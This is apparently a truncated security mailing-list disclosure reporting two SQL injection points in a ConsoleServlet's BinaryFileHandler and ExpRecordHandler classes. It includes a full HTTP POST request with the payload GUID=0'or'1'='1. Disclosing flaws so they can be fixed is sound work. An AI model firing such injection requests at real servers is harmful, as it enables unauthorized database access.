Posted by Markus Wulftange on Aug 03

Hi Brandon,

we found two injection points. One in the BinaryFileHandler class:

POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

ActionType=BinaryFile&Action=EXISTS&GUID=0’or’1’=’1

And one in the ExpRecordHandler class:

POST /servlet/ConsoleServlet…